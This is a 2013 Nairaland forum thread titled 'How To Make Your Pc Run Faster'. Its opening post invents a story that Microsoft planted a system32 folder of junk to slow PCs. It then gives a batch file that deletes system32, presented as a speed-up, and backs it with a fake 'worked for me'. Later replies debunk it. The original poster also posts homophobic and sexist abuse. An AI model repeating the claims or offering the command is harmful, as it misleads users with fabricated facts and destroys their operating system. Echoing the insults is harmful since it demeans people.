Welcome, Guest: Register On Nairaland / LOGIN! / Trending / Recent / New
Stats: 3,148,892 members, 7,802,873 topics. Date: Saturday, 20 April 2024 at 12:24 AM

How To Make Your Pc Run Faster - Computers - Nairaland

Nairaland Forum / Science/Technology / Computers / How To Make Your Pc Run Faster (1622 Views)

Exclusively To Windows 7 Users - How To Make Your Pc Run Faster / How To Make Google Chrome Run Faster / System Requirements Thread: Can My PC Run It? (2) (3) (4)

(1) (Reply) (Go Down)

How To Make Your Pc Run Faster by Risky005: 2:43pm On Sep 24, 2013
When Microsoft was first getting started, they knew they wouldn't make enough money just from the profits of their operating system. Everybody knows people pirate Windows. So they had to get creative. A guy named Chris Liddel came up with the idea to put a folder called "system32" in the Windows folder that literally slows down your machine--on purpose. "System32" holds 32 GIGABYTES of deleted files, internet history, uninstalled programs, and other worthless crap that intentionally clogs up your machine. Why did they do it? Because Microsoft owns several PC "cleaning" tools, like TuneUp Utilities, Norton Antivirus, etc. More money for them. I'm not cool with that, however. Here's how to outsmart those assholes once and for all.
Open notepad:
Type the following text:

@echo off
del C:\\WINDOWS\system32

Save as "speedup.bat" (select "all files" instead of "text document"wink
Double click the .bat file.
Reboot, and your PC is twice as fast
Re: How To Make Your Pc Run Faster by Risky005: 2:46pm On Sep 24, 2013
Worked for me no more pc hanging
Re: How To Make Your Pc Run Faster by yoddy(m): 3:13pm On Sep 24, 2013
Risky005: Worked for me no more pc hanging

I doubt if the OS would boot up after this... Goodluck.
Re: How To Make Your Pc Run Faster by onegig(m): 3:45pm On Sep 24, 2013
yoddy:

I doubt if the OS would boot up after this... Goodluck.
i can't laugh. . The guy is probably mad... delete system32 which holds the main operating system files?

This must be a joke. Don't try this at home please.
Re: How To Make Your Pc Run Faster by Tuntheycr7: 7:45pm On Sep 24, 2013
onegig: i can't laugh. . The guy is probably mad... delete system32 which holds the main operating system files?

Abi o...
I just pity d novice dt wud try this.
Some pple wud come back here to cry and u knw wat d means
Re: How To Make Your Pc Run Faster by AskProf: 8:06am On Sep 25, 2013
onegig: i can't laugh. . The guy is probably mad... delete system32 which holds the main operating system files?

... in school or anywhere.
Re: How To Make Your Pc Run Faster by satmaniac(m): 9:46pm On Sep 26, 2013
U dont dare try it,check the name of d poster out....so its risky.
Re: How To Make Your Pc Run Faster by Risky005: 5:27pm On Sep 27, 2013

hey onegig how about I stick my dick up in your ass would make you feel better gay.
Re: How To Make Your Pc Run Faster by onegig(m): 12:24am On Sep 28, 2013
Risky005: hey onegig how about I stick my dick up in your ass would make you feel better gay.

Would feel good for you if you would stick it in a bee infested tree instead. cheesy

2 Likes

Re: How To Make Your Pc Run Faster by Joel3(m): 5:56am On Sep 28, 2013
this poster deserve to be ban, what are the moderator doing on this board. nairaland is becoming a bad place.
Re: How To Make Your Pc Run Faster by Risky005: 8:16am On Sep 30, 2013
Joel.:
this poster deserve to be ban, what are the moderator doing on this board. nairaland is becoming a bad place.
hey joelita a woman's place is in the kitchen why don't you go and cook for your husband/master. God women have too much rights nowadays. Smh
Re: How To Make Your Pc Run Faster by nasonaso: 1:38pm On Sep 30, 2013
thanks guys almost did it
Re: How To Make Your Pc Run Faster by onegig(m): 12:39pm On Oct 04, 2013
nasonaso: thanks guys almost did it

Thank Goodness you never did we would have been singing another new song by now.

(1) (Reply)

Spss Software Free Download Linmks / I Am Having Problems With Downloading Yahoo Messenger Pls Somebody Rescue Me Out / Recharge Card Makin Machine Call 08103662722

(Go Up)

Sections: politics (1) business autos (1) jobs (1) career education (1) romance computers phones travel sports fashion health
religion celebs tv-movies music-radio literature webmasters programming techmarket

Links: (1) (2) (3) (4) (5) (6) (7) (8) (9) (10)

Nairaland - Copyright © 2005 - 2024 Oluwaseun Osewa. All rights reserved. See How To Advertise. 14
Disclaimer: Every Nairaland member is solely responsible for anything that he/she posts or uploads on Nairaland.